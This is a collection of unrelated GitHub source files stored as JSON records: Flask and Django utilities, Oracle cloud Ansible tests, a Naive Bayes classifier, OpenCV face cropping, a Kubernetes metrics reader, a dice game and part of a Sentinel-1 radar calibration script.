+{"seq_id":"42363016","text":"from flask import Flask\nfrom flask_cors import CORS\n\nfrom app.auth.controllers import auth as auth_module, init_jwt\n\n# Define the WSGI application object\n\napp = Flask(__name__)\n\ndef setup_app(app):\n CORS(app)\n\n # Configurations\n app.config.from_object('config')\n\n # Sample HTTP error handling\n @app.errorhandler(404)\n def not_found(error):\n return 'Not found', 404\n\n # Register blueprint(s)\n app.register_blueprint(auth_module)\n init_jwt(app)\n\n","repo_name":"r3mariano/flask-cognito-auth-jwt","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"26875804281","text":"import time\nimport logging\nimport datetime\nimport re\n\nimport html2text\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.conf import settings\nfrom django.template.loader import render_to_string\nfrom django.utils import timezone\n\nfrom djapp import models\n\n\nlogger = logging.getLogger(__name__)\n\n\n\nclass Email:\n def __init__(self, key):\n self.key = key\n\n def _apply_whitelist(self, to):\n whitelist = settings.EMAIL_WHITELIST\n # Apply whitelist\n if whitelist is not None:\n whitelist = whitelist + ['@example.com']\n l = []\n for email in to:\n for allowed_email in whitelist:\n if allowed_email == email or (allowed_email.startswith('@') and email.endswith(allowed_email)):\n l.append(email)\n break\n else:\n logger.info('Skip mail %s: Not in whitelist', email)\n to = l\n return list(set(to))\n\n def send(self, to, context, from_email=None):\n if isinstance(to, str):\n to = [to]\n\n orig_to = to\n to = self._apply_whitelist(to)\n if not to:\n logger.info('Nothing to send. To: before whitelist: %s', orig_to)\n return\n\n # render\n subject = self.render('emails/' + self.key + '_subject.html', context)\n subject = subject.replace('\\n', ' ').replace('\\r', ' ').strip()\n body_html = self.render('emails/' + self.key + '_body.html', context)\n body_text = html2text.html2text(body_html)\n\n msg = EmailMultiAlternatives(\n subject=subject,\n from_email=from_email,\n to=to,\n body=body_text,\n reply_to=['conseiller-numerique@anct.gouv.fr'],\n )\n msg.attach_alternative(body_html, 'text/html')\n logger.info('Send email to %s, from %r, key=%r, subject: %s', to, from_email, self.key, subject)\n msg.send()\n\n def render(self, template_name, context):\n return render_to_string(template_name, context)\n","repo_name":"anct-cnum/conseiller-numerique","sub_path":"back/djapp/utils/emails.py","file_name":"emails.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"38022626344","text":"import os.path\nimport random\nfrom urllib import parse\nfrom urllib import request\nfrom ua_info import ua_list\n\n\ndef get_url(word):\n query_string = {\n 'wd': word\n }\n\n url = \"http://www.baidu.com/s?{}\".format(parse.urlencode(query_string))\n return url\n\n\ndef request_url(url, fileName):\n headers = {\n 'User-Agent': random.sample(ua_list, 1)[0]\n }\n req = request.Request(url=url, headers=headers)\n res = request.urlopen(req)\n html = res.read().decode('utf-8')\n with open(fileName, 'w', encoding='utf-8') as f:\n f.write(html)\n\n\ndef generateFileName(savePath, fileName):\n fileName = os.path.join(savePath, fileName + \".html\")\n return fileName\n\n\nif __name__ == \"__main__\":\n word = \"色图\"\n path = \"/Users/yifanhuang/PycharmProjects/pythonProject/crawler/tutorial/result\"\n request_url(get_url(word), generateFileName(path, \"result1.1\"))\n","repo_name":"yifanHuang129/Crawler_learning","sub_path":"exercise1.1.py","file_name":"exercise1.1.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"13279519459","text":"import pytest\nfrom nose.plugins.skip import SkipTest\nfrom ansible.module_utils import six\nfrom ansible.module_utils.oracle import oci_utils\nfrom ansible.modules.cloud.oracle import oci_app_catalog_subscription_facts\n\ntry:\n import oci\n from oci.util import to_dict\n from oci.core.models import AppCatalogSubscription\n from oci.exceptions import ServiceError\nexcept ImportError:\n raise SkipTest(\"test_oci_app_catalog_subscription_facts.py requires `oci` module\")\n\n\nclass FakeModule(object):\n def __init__(self, **kwargs):\n self.params = kwargs\n\n def fail_json(self, *args, **kwargs):\n self.exit_args = args\n self.exit_kwargs = kwargs\n raise Exception(kwargs[\"msg\"])\n\n def exit_json(self, *args, **kwargs):\n self.exit_args = args\n self.exit_kwargs = kwargs\n\n\n@pytest.fixture()\ndef compute_client(mocker):\n mock_compute_client = mocker.patch(\"oci.core.compute_client.ComputeClient\")\n return mock_compute_client.return_value\n\n\n@pytest.fixture()\ndef list_all_resources_patch(mocker):\n return mocker.patch.object(oci_utils, \"list_all_resources\")\n\n\n@pytest.fixture()\ndef call_with_backoff_patch(mocker):\n return mocker.patch.object(oci_utils, \"call_with_backoff\")\n\n\ndef get_app_catalog_subscription(**kwargs):\n app_catalog_subscription = AppCatalogSubscription(\n compartment_id=\"ocid1.compartment.oc1..xxxxxEXAMPLExxxxx\",\n listing_id=\"ocid1.appcataloglisting.oc1..xxxxxEXAMPLExxxxx\",\n listing_resource_version=\"1.0\",\n )\n for attr, val in six.iteritems(kwargs):\n setattr(app_catalog_subscription, attr, val)\n return app_catalog_subscription\n\n\ndef get_app_catalog_subscriptions():\n return [\n get_app_catalog_subscription(\n compartment_id=\"ocid1.compartment.oc1..xxxxxEXAMPLExxxxx\",\n listing_id=\"ocid1.appcataloglisting.oc1..xxxxxEXAMPLExxxxx1\",\n listing_resource_version=\"1.0\",\n ),\n get_app_catalog_subscription(\n compartment_id=\"ocid1.compartment.oc1..xxxxxEXAMPLExxxxx\",\n listing_id=\"ocid1.appcataloglisting.oc1..xxxxxEXAMPLExxxxx2\",\n listing_resource_version=\"1.0\",\n ),\n ]\n\n\ndef get_module(**kwargs):\n params = {\"compartment_id\": \"ocid1.compartment.oc1..xxxxxEXAMPLExxxxx\"}\n params.update(kwargs)\n module = FakeModule(**params)\n return module\n\n\ndef get_response(status=200, headers=None, data=None, request=None):\n if not headers:\n headers = dict()\n return oci.Response(status, headers, data, request)\n\n\ndef test_list_app_catalog_subscriptions_raises_service_error(\n compute_client, list_all_resources_patch\n):\n list_all_resources_patch.side_effect = ServiceError(\n 500, \"InternalServerError\", dict(), \"Internal Server Error\"\n )\n with pytest.raises(ServiceError) as exc_info:\n oci_app_catalog_subscription_facts.list_app_catalog_subscriptions(\n compute_client, get_module()\n )\n se = exc_info.value\n assert se.status == 500\n assert se.code == \"InternalServerError\"\n assert se.message == \"Internal Server Error\"\n\n\ndef test_list_app_catalog_subscriptions_when_no_subscriptions_exist(\n compute_client, list_all_resources_patch\n):\n module = get_module()\n list_all_resources_patch.return_value = []\n result = oci_app_catalog_subscription_facts.list_app_catalog_subscriptions(\n compute_client, module\n )\n list_all_resources_patch.assert_called_once()\n list_all_resources_patch.assert_called_with(\n compute_client.list_app_catalog_subscriptions,\n compartment_id=module.params[\"compartment_id\"],\n )\n assert len(result) == 0\n\n\ndef test_list_app_catalog_subscriptions_when_subscriptions_exist(\n compute_client, list_all_resources_patch\n):\n module = get_module()\n app_catalog_subscriptions = get_app_catalog_subscriptions()\n list_all_resources_patch.return_value = app_catalog_subscriptions\n result = oci_app_catalog_subscription_facts.list_app_catalog_subscriptions(\n compute_client, module\n )\n list_all_resources_patch.assert_called_once()\n list_all_resources_patch.assert_called_with(\n compute_client.list_app_catalog_subscriptions,\n compartment_id=module.params[\"compartment_id\"],\n )\n assert len(result) == 2\n\n\ndef test_list_app_catalog_subscriptions_filter_by_listing_id(\n compute_client, list_all_resources_patch\n):\n listing_id = \"ocid1.appcataloglisting.oc1..xxxxxEXAMPLExxxxx\"\n module = get_module(listing_id=listing_id)\n app_catalog_subscription = get_app_catalog_subscription(listing_id=listing_id)\n list_all_resources_patch.return_value = [app_catalog_subscription]\n result = oci_app_catalog_subscription_facts.list_app_catalog_subscriptions(\n compute_client, module\n )\n assert len(result) == 1\n assert result[0][\"compartment_id\"] == app_catalog_subscription.compartment_id\n assert result[0][\"listing_id\"] == app_catalog_subscription.listing_id\n list_all_resources_patch.assert_called_with(\n compute_client.list_app_catalog_subscriptions,\n compartment_id=module.params[\"compartment_id\"],\n listing_id=listing_id,\n )\n","repo_name":"oracle/oci-ansible-modules","sub_path":"test/units/test_oci_app_catalog_subscription_facts.py","file_name":"test_oci_app_catalog_subscription_facts.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"38"}
+{"seq_id":"8699218791","text":"from sklearn.naive_bayes import GaussianNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC, LinearSVC\nimport numpy as np\nfrom glob import glob\nimport os \nfrom sklearn.model_selection import KFold\nfrom torch import optim\nimport torch \nimport torchvision\nimport torch.nn as nn \nimport time\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.base import BaseEstimator, ClassifierMixin\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import cross_val_score\n\n\ndef evaluate_classifier(clf, X, y, folds=5):\n\t\"\"\"\n\t\tReturns the 5-fold accuracy for classifier clf on X and y\n\t\tArgs:\n\t\t\tclf (sklearn.base.BaseEstimator): classifier\n\t\t\tX (np.ndarray): Digits data (nsamples x nfeatures)\n\t\t\ty (np.ndarray): Labels for dataset (nsamples)\n\t\tReturns:\n\t\t\t(float): The 5-fold classification score (accuracy)\n\t\t\t\n\t\"\"\"\n\tscores = cross_val_score(clf, X, y,cv=KFold(n_splits=5),scoring=\"accuracy\", n_jobs=-1)\n\treturn np.mean(scores)\n\n\ndef calculate_priors(X, y):\n\t\"\"\"Return the a-priori probabilities for every class\n\tArgs:\n\t\tX (np.ndarray): Digits data (nsamples x nfeatures)\n\t\ty (np.ndarray): Labels for dataset (nsamples)\n\tReturns:\n\t\t(np.ndarray): (n_classes) Prior probabilities for every class\n\t\"\"\"\n\toccurances = [0]*len(set(y))\n\tfor label in y :\n\t\toccurances[label]+=1\n\treturn np.asarray(list(map(lambda x: x/len(y),occurances)))\n\ndef gauss_prob(x,mean,var):\n\tif var==0:\n\t\tvar=1e-9\n\tprob = -( np.square(x-mean)/(2*var)) - 0.5*np.log(2*np.pi*var)\n\treturn prob\n \ndef digit_mean(X, y, digit):\n\t'''Calculates the mean for all instances of a specific digit\n\tArgs:\n\t\tX (np.ndarray): Digits data (nsamples x nfeatures)\n\t\ty (np.ndarray): Labels for dataset (nsamples)\n\t\tdigit (int): The digit we need to select\n\tReturns:\n\t\t(np.ndarray): The mean value of the digits for every pixel\n\t'''\n\n\tdigit_indices = []\n\tmean = []\n\tfeature_values = []\n\tfor i,label in enumerate(y) :\n\t\tif label == digit :\n\t\t\tdigit_indices.append(i)\n\n\tfor i in range(len(X[0])):\n\t\t# gather same feature of all digit samples in order to calculate their mean value\n\t\tfor index in digit_indices:\n\t\t\tfeature_values.append(X[index,i])\n\n\t\t# save mean value of digit in mean \n\t\tmean.append(np.asarray(feature_values).mean())\n\t\t\n\t\t#reset feature_values as empty list for next feature of digit \n\t\tfeature_values = []\n\n\treturn np.asarray(mean)\n \n\ndef digit_variance(X, y, digit):\n\t'''Calculates the variance for all instances of a specific digit\n\tArgs:\n\t\tX (np.ndarray): Digits data (nsamples x nfeatures)\n\t\ty (np.ndarray): Labels for dataset (nsamples)\n\t\tdigit (int): The digit we need to select\n\tReturns:\n\t\t(np.ndarray): The variance value of the digits for every pixel\n\t'''\n\tdigit_indices = []\n\tvariance = []\n\tfeature_values = []\n\tfor i,label in enumerate(y) :\n\t\tif label == digit :\n\t\t\tdigit_indices.append(i)\n\n\tfor i in range(len(X[0])):\n\t\t# gather same feature of digit in order to calculate their mean value\n\t\tfor index in digit_indices:\n\t\t\tfeature_values.append(X[index,i])\n\n\t\t# append mean value of same feature of all digit samples in mean \n\t\tvariance.append(np.asarray(feature_values).var())\n\t\t\n\t\t#reset feature_values as empty list for next feature of digit \n\t\tfeature_values = []\n\n\treturn np.asarray(variance)\n\nclass CustomNBClassifier(BaseEstimator, ClassifierMixin):\n\t\"\"\"Custom implementation Naive Bayes classifier\"\"\"\n\n\tdef __init__(self, use_unit_variance=False):\n\t\tself.X_mean_ = None\n\t\tself.use_unit_variance = use_unit_variance\n\t\tself.X_var_= None\n\n\n\tdef fit(self, X, y):\n\t\t\"\"\"\n\t\tThis should fit classifier. All the \"work\" should be done here.\n\t\tCalculates self.X_mean_ based on the mean\n\t\tfeature values in X for each class.\n\t\tself.X_mean_ becomes a numpy.ndarray of shape\n\t\t(n_classes, n_features)\n\t\tfit always returns self.\n\t\t\"\"\"\n\t\tself.y=y\n\t\tself.X_mean_ = np.empty((len(set(y)),X.shape[1]))\n\t\tself.X_var_ = np.empty((len(set(y)),X.shape[1]))\n\n\t\tfor i in range(len(set(y))):\n\t\t\tself.X_mean_[i]=digit_mean(X,y,i)\n\t\t\tself.X_var_[i]=digit_variance(X,y,i)\n\t\t\n\t\t#If use_unit_variance is True set variance for all classes to one\n\t\tif self.use_unit_variance:\n\t\t\tself.X_var_ = np.ones((X.shape[0],X.shape[1]))\n\t\tself.apriori = np.log(calculate_priors(X,y))\n\n\t\treturn self\n\n\n\tdef predict(self, X):\n\t\t\"\"\"\n\t\tMake predictions for X based on the\n\t\teuclidean distance from self.X_mean_\n\t\t\"\"\"\n\t\tself.posterior = np.empty((len(set(self.y)),))\n\t\tself.predicts = np.empty((X.shape[0],),dtype=np.int64)\n\t\tfor i,feutures in enumerate(X):\n\t\t\tfor c in range(len(set(self.y))):\n\t\t\t\tself.posterior[c] =self.apriori[c] + np.sum([gauss_prob(a,self.X_mean_[c][feaut_num],self.X_var_[c][feaut_num]) for feaut_num,a in enumerate(feutures)]) \n\n\t\t\tself.predicts[i] = np.argmax(self.posterior)\n\t\treturn self.predicts\n\n\tdef score(self, X, y):\n\t\t\"\"\"\n\t\tReturn accuracy score on the predictions\n\t\tfor X based on ground truth y\n\t\t\"\"\"\n\t\treturn accuracy_score(np.asarray(self.predict(X)),y)\n\t","repo_name":"savassif/Pattern-Recognition-NTUA","sub_path":"2nd/lib2.py","file_name":"lib2.py","file_ext":"py","file_size_in_byte":4882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"14891609557","text":"import cv2\r\n\r\nclass FaceExtraction:\r\n def face_extraction(self):\r\n # img = cv2.imread(\"D:\\\\SPIT\\\\Semester 4\\\\Mini Project\\\\Wroking Module\\\\VerifyMe\\\\AadharCardProcessing\\\\Asset\\\\aadharCard.png\")\r\n img = cv2.imread(\"D:\\\\SPIT\\\\Semester 4\\\\Mini Project\\\\Wroking Module\\\\VerifyMe\\\\MiddleTier\\\\aadharCard.png\")\r\n # cv2.imshow(img)\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n face_cascade = cv2.CascadeClassifier('D:\\\\SPIT\\\\Semester 4\\\\Mini Project\\\\Wroking Module\\\\VerifyMe\\\\AadharCardProcessing\\\\Asset\\\\haarcascade_frontalface_alt.xml')\r\n faces = face_cascade.detectMultiScale(gray, 1.1, 4)\r\n for (x, y, w, h) in faces:\r\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 2)\r\n faces = img[y:y + h, x:x + w]\r\n cv2.imshow(\"face\", faces)\r\n cv2.imwrite('D:\\\\SPIT\\\\Semester 4\\\\Mini Project\\\\Wroking Module\\\\VerifyMe\\\\AadharCardProcessing\\\\Asset\\\\face.jpg', faces)\r\n cv2.imwrite('D:\\\\SPIT\\\\Semester 4\\\\Mini Project\\\\Wroking Module\\\\VerifyMe\\\\AadharCardProcessing\\\\Asset\\\\detcted.jpg', img)\r\n cv2.imshow('img', img)\r\n cv2.waitKey()","repo_name":"Shivam-Chaubey/autokyc","sub_path":"AadharCardProcessing/faceExtract.py","file_name":"faceExtract.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"30510615826","text":"#\r\n# This file is part of Efforia project.\r\n#\r\n# Copyright (C) 2011-2013 William Oliveira de Lagos \r\n#\r\n# Efforia is free software: you can redistribute it and/or modify\r\n# it under the terms of the Lesser GNU General Public License as published by\r\n# the Free Software Foundation, either version 3 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# Efforia is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU Lesser General Public License\r\n# along with Efforia. If not, see .\r\n#\r\n\r\nfrom django import forms\r\nfrom crispy_forms.helper import FormHelper\r\nfrom crispy_forms.layout import Layout, Div, Hidden, HTML, Field\r\n\r\nclass PhotoForm(forms.Form):\r\n file = forms.FileField(label='')\r\n redirect = forms.CharField(label='')\r\n def __init__(self, *args, **kwargs):\r\n self.helper = FormHelper()\r\n self.helper.form_action = '/efforia/photo'\r\n self.helper.layout = Layout(\r\n Hidden('redirect',value='1'),\r\n Field('file',style='opacity:0; width:0; height:0',css_class='file'),\r\n Div(HTML(\" \"),css_class='upload')\r\n )\r\n super(PhotoForm, self).__init__(*args, **kwargs)\r\n","repo_name":"williamlagos/django-coding","sub_path":"pandora-hub/pandora/hub/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"72901408430","text":"\nfrom kubernetes import client, config\nimport time\nimport pandas as pd\n\ndef metricsCpu():\n try:\n config.load_kube_config()\n api = client.CustomObjectsApi()\n cpu = 0\n memory = 0\n cpul =[]\n memoryl = []\n k8s_nodes = api.list_cluster_custom_object(\"metrics.k8s.io\", \"v1beta1\", \"pods\")\n for stats in k8s_nodes['items']:\n if 'nginx' in stats['metadata']['name']: \n #print(\"Node Name: %s\" % (stats['metadata']['name']))\n #print(stats)\n for c in stats['containers']:\n cpul.append(int(c['usage']['cpu'].split('n')[0])/1000000)\n # memoryl.append(int(c['usage']['memory'].split('Ki')[0])*1024/1048576)\n cpu += int(c['usage']['cpu'].split('n')[0])\n # memory += int(c['usage']['memory'].split('Ki')[0])\n # print(cpul,memoryl)\n print(\"CPU: %s\\t\" %(max(cpul)))\n return max(cpul),0\n except:\n return 0,0\n\nmetricsCpu()\n\n","repo_name":"dj5/Kubernetes_Vertical_Pod_Autoscaling_Using_RL","sub_path":"rl/cpumemory.py","file_name":"cpumemory.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"}
+{"seq_id":"29032024888","text":"import os\n\nfrom entity.humod import Humod as HumodEntity\n\nfrom ..model import Model\nfrom .load import load\n\n\nclass Humod(Model):\n def __init__(self):\n self.omname = \"humod\"\n self.imname = \"\"\n self.ometype = HumodEntity\n\n def dotransform(self, store):\n src = getattr(store.env, \"src\", None)\n ctx = {\n \"base\": getattr(store.env, \"base\", os.getcwd()),\n \"verbose\": getattr(store.env, \"verbose\", False),\n # \"imodel\": src,\n \"omodel\": store.models[\"humod\"],\n \"store\": store,\n }\n load(src, ctx)\n","repo_name":"masol/bot","sub_path":"src/trans/humod/humod.py","file_name":"humod.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"29365474600","text":"import random\n\n\nclass Dado:\n def __init__(self, min_vel=1, max_vel=6):\n self.min = min_vel\n self.min_original = min_vel\n self.max = max_vel\n self.max_original = max_vel\n\n def jogar(self, n_dados=1, separado=False):\n # Joga os dados no tabuleiro, sorteando um número entre o máximo e mínimo\n # Sorteia quando vezes for solicitado\n # Pode devolver só a soma dos sorteios ou o resultado individual de cada\n numeros = []\n result = 0\n x = 0\n while x < n_dados:\n x += 1\n numeros.append(int(random.uniform(self.min, self.max)))\n for x in numeros:\n result += x\n if not separado:\n return result\n elif separado:\n return result, numeros\n\n def altera_min_max(self, min_vel=0, max_vel=6):\n # Altera valor mínimo e máximo das faces\n self.min = min_vel\n self.max = max_vel\n\n def reseta_valores(self):\n # Reseta para valoeres originais\n self.min = self.min_original\n self.max = self.max_original\n\n\nclass Interacao:\n def __init__(self, dado_obj):\n self.dado = dado_obj\n self.individual = False\n\n def init(self):\n # Ao Iniciar o programa\n print('********************')\n print('*****DadoSystem*****')\n print('********************')\n print('Olá, bem vindo!')\n\n def tratar(self, string):\n # Tenta tranformar string em um inteiro, ou deixa a string toda e low\n result = string.lower()\n try:\n result = int(string)\n finally:\n return result\n\n def print_config_alteracao(self):\n # Print a explicação de como fazer a alteração dos valoeres mínimos e máximos dos dados\n print(\"-Em caso de dois valores separados por um espaço (' ') \"\n \"o primeiro será o valor mínimo e p segundo o valor máximo;\")\n print(\"-Em caso de um único valor, esse valor será inválido;\")\n print(\n f\"-Para alterar o valor máximo, coloque {self.dado.min} \"\n f\"(que é o atual valor mínimo), espaço e o novo valor máximo;\")\n print(\n f\"-Para alterar o valor mínimo, coloque o novo valor mínimo, espaço e {self.dado.max} \"\n f\"(que é o atual valor máximo);\")\n print(\"-Outras entradas são inválidas.\\n\")\n self.alterar_max_min()\n\n def alterar_max_min(self):\n # Altera valor mínimo e máximo das faces do dado\n result = input('Qual os valores? (e para explicação):')\n result = result.lower()\n if result == 'e':\n self.print_config_alteracao()\n else:\n result = result.split()\n result_tratado = []\n for x in result:\n x = self.tratar(x)\n if isinstance(x, int):\n result_tratado.append(x)\n else:\n result_tratado = 'Iválido'\n if result_tratado == 'Inválido':\n print('Inválido')\n else:\n min_vel, max_vel = self.desempacotar_alteracoes(result_tratado)\n self.dado.altera_min_max(min_vel, max_vel)\n print(f'Novo mínimo {self.dado.min}')\n print(f'Novo máximo {self.dado.max}')\n\n def desempacotar_alteracoes(self, vel):\n # Tenta desempacotar os valores alterados\n vel_1, vel_2 = 0, 0\n try:\n vel_1, vel_2 = vel\n except:\n print('Valore inválidos, operação falhou. Os valores foram resetados.')\n vel_1, vel_2 = self.dado.min_original, self.dado.max_original\n finally:\n return vel_1, vel_2\n\n def alterar_individual(self):\n # Altera se os valores viram separador ou não\n if not self.individual:\n self.individual = True\n print('Alteração realizada, agora você vera todos os resultados individuais.')\n elif self.individual:\n self.individual = False\n print('Alteração realizada, agora você não vera todos os resultados individuais.')\n\n def comandos(self):\n # Printa os comando disponíveis\n print(\"'' ou 'j' para Jogo simples;\")\n print(\"Número x para Jogar x vezes o dado;\")\n print(\"'a' para alterar máximo e mínimo dos valores das faces do dado;\")\n print(\"'i' para alterar se você quer ou não os valores individuais de cada jogada no tabuleiro;\")\n print(\"'e' para sair;\")\n print(\"'c' para ver os comandos.\")\n self.entrada_usuario()\n\n def entrada_usuario(self):\n # Faz a entrada do usuário, aceita comandos\n answer = input(\"Deseja jogar os dados ou alterar o valores?: \\n('c' para ver comandos)\\n\")\n answer = self.tratar(answer)\n\n if answer == \"\" or answer == \"j\" or answer == ' ':\n result = self.dado.jogar(separado=self.individual)\n return result\n elif isinstance(answer, int):\n result = self.dado.jogar(n_dados=answer, separado=self.individual)\n return result\n elif answer == 'a':\n self.alterar_max_min()\n elif answer == \"e\":\n return False\n elif answer == 'i':\n self.alterar_individual()\n elif answer == 'c':\n self.comandos()\n else:\n print('Não entendi.')\n\n\nif __name__ == '__main__':\n dado = Dado()\n inter = Interacao(dado)\n inter.init()\n\n while True:\n play = inter.entrada_usuario()\n if play is None:\n pass\n elif play is False:\n break\n else:\n print(f'Os dados deram {play}')\n","repo_name":"RafaelKC/Dados_de_Tabuleiro","sub_path":"dados_files/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5692,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"27599414435","text":"#!/usr/bin/env python3.6\n\n# Applies Radiometric Calibration and Terrain Correction using ESA SNAP python wrapper to a single GRD product\n\nimport os\nimport re\nimport gc\nimport shutil\nimport argparse\nimport zipfile\nimport fiona\nimport shapely.geometry\nimport snappy\nfrom snappy import ProductIO\nfrom snappy import HashMap\nfrom snappy import GPF\n\nallowed_polarizations = ['HH', 'HV', 'VH', 'VV']\n\ndef main(infolder=False, outfolder=False, polarization=False, basename=False,\n wktstring=False, shapefile=False, pixel_spacing=100, db=False, cleanup=False, unzip=False):\n '''main loop for generating calibration products. infolder can be a folder of .SAF/zip files or a .SAFE/zip file'''\n print('--------------------------------\\nRunning Extraction and Calibration over:{}'.format(infolder))\n if shapefile:\n wktstring = get_wkt_from_shapefile(shapefile)\n if db:\n print('output products will be generated in decibels.')\n infolder = unzip_check(infolder, cleanup) # unzip if required\n # determine if we need to walk the dir\n if infolder is False or not os.path.exists(infolder):\n raise Exception('must provide valid input path.')\n if contains_valid_product(infolder, polarization):\n # process the file\n calibrate_file(infolder, outfolder, polarization, basename, wktstring, pixel_spacing, db, cleanup)\n elif os.path.isdir(infolder):\n #see if we can process any subfolders\n for item in os.listdir(infolder):\n folder_path = os.path.join(infolder, item)\n subfolder = unzip_check(folder_path, cleanup)\n if contains_valid_product(subfolder, polarization):\n calibrate_file(subfolder, outfolder, polarization, basename, wktstring, pixel_spacing, db, cleanup)\n\ndef unzip_check(path, cleanup):\n '''checks the path to see if it's a valid zip file. If true, will unzip and return path to new folder.\n if False, will return the path.'''\n if path.lower().endswith('zip') and zipfile.is_zipfile(path):\n # extract the file\n filename = os.path.basename(path)\n base = os.path.splitext(filename)[0] + '.SAFE'\n folder = os.path.dirname(path)\n output_path = os.path.join(folder, base)\n if os.path.exists(output_path):\n return output_path # don't extract if the folder already exists\n print('extracting {}...'.format(filename))\n with zipfile.ZipFile(path,\"r\") as zip_ref:\n zip_ref.extractall(folder)\n if cleanup:\n os.remove(path)\n return output_path\n return path\n\ndef contains_valid_product(path, polarization):\n '''checks to see if the given directory contains a valid .tiff GRD file with the optional polarization'''\n if not os.path.isdir(path):\n return False\n meas_dir = os.path.join(path, 'measurement')\n if not 'measurement' in os.listdir(path) or not os.path.isdir(meas_dir):\n return False\n regex = 's1.*-grd-.*.tiff'\n if polarization:\n regex = 's1.*-grd-{}-.*.tiff'.format(polarization.lower())\n for fil in os.listdir(meas_dir):\n print('checking {}'.format(fil))\n if bool(re.search(regex, fil.lower())):\n return True\n return False\n\ndef get_wkt_from_shapefile(shapefile_path):\n '''returns the wkt string from the input shapefile'''\n if not os.path.exists(shapefile_path):\n raise Exception(\"invalid shapefile path: {}\".format(shapefile_path))\n c = fiona.open(shapefile_path)\n collection = [ shapely.geometry.shape(item['geometry']) for item in c ]\n return [j.wkt for j in collection][0]\n\ndef calibrate_file(infolder, outfolder, polarization, basename, wktstring, pixel_spacing, db, cleanup):\n '''calibrate input product'''\n print('--------------------------\\nCalibrating product: {}'.format(infolder))\n if outfolder is False:\n outfolder = os.path.join(os.getcwd(), 's1_preprocessed')\n if not os.path.exists(outfolder):\n os.makedirs(outfolder)\n assert polarization in allowed_polarizations\n if polarization is False:\n polarization = ['HH', 'HV', 'VH', 'VV']\n else:\n polarization = [polarization]\n if wktstring is False:\n wktstring = 'POLYGON ((-94.3242680177268 -68.1554115901846,-94.4799907148995 -78.0386897518533,-133.488922458484 -75.1093782424761,-116.988045118527 -66.0302485803105,-94.3242680177268 -68.1554115901846))'\n\n GPF.getDefaultInstance().getOperatorSpiRegistry().loadOperatorSpis()\n HashMap = snappy.jpy.get_type('java.util.HashMap')\n gc.enable()\n\n # build folder paths\n folder = os.path.basename(infolder)\n for pol in polarization:\n\n if basename is False:\n print(\"folder: {}\".format(folder))\n basename = os.path.basename(folder).rstrip('.SAFE')\n calib = os.path.join(outfolder, '{}.{}.{}.calibrated'.format(basename, pol, pixel_spacing)) \n subset = os.path.join(outfolder, '{}.{}.{}.subset'.format(basename, pol, pixel_spacing))\n terrain = os.path.join(outfolder, '{}.{}.{}.corrected'.format(basename, pol, pixel_spacing))\n \n # read product\n sentinel_1 = ProductIO.readProduct(os.path.join(infolder, \"manifest.safe\")) \n\n ### CALIBRATION\n parameters = HashMap() \n parameters.put('outputSigmaBand', True) \n parameters.put('sourceBands', 'Intensity_' + pol) \n parameters.put('selectedPolarisations', pol) \n parameters.put('outputImageScaleInDb', db) \n print('Applying radiometric correction: {}'.format(calib))\n target_0 = GPF.createProduct(\"Calibration\", parameters, sentinel_1) \n ProductIO.writeProduct(target_0, calib, 'BEAM-DIMAP')\n \n ### SUBSET\n calibration = ProductIO.readProduct(calib + \".dim\") \n WKTReader = snappy.jpy.get_type('com.vividsolutions.jts.io.WKTReader') \n geom = WKTReader().read(wktstring)\n parameters = HashMap()\n parameters.put('geoRegion', geom)\n parameters.put('outputImageScaleInDb', db)\n print('Generating subset file: {}'.format(subset))\n target_1 = GPF.createProduct(\"Subset\", parameters, calibration)\n ProductIO.writeProduct(target_1, subset, 'BEAM-DIMAP')\n \n ### TERRAIN CORRECTION\n parameters = HashMap() \n parameters.put('demResamplingMethod', 'NEAREST_NEIGHBOUR') \n parameters.put('imgResamplingMethod', 'NEAREST_NEIGHBOUR') \n parameters.put('demName', 'GETASSE30') \n parameters.put('pixelSpacingInMeter', pixel_spacing) \n parameters.put('sourceBands', 'Sigma0_' + pol)\n print('Applying terrain correction: {}'.format(terrain)) \n target_2 = GPF.createProduct(\"Terrain-Correction\", parameters, target_1) \n ProductIO.writeProduct(target_2, terrain, 'GeoTIFF')\n \n del target_0\n del target_1\n del target_2\n if cleanup is True:\n os.remove(calib + '.dim')\n os.remove(subset + '.dim')\n shutil.rmtree(subset + '.data')\n shutil.rmtree(calib + '.data')\n if cleanup:\n shutil.rmtree(infolder)\n\ndef parser():\n '''\n Construct a parser to parse arguments, returns the parser\n '''\n parse = argparse.ArgumentParser(description=\"Apply radiometric and terrain corrections\")\n 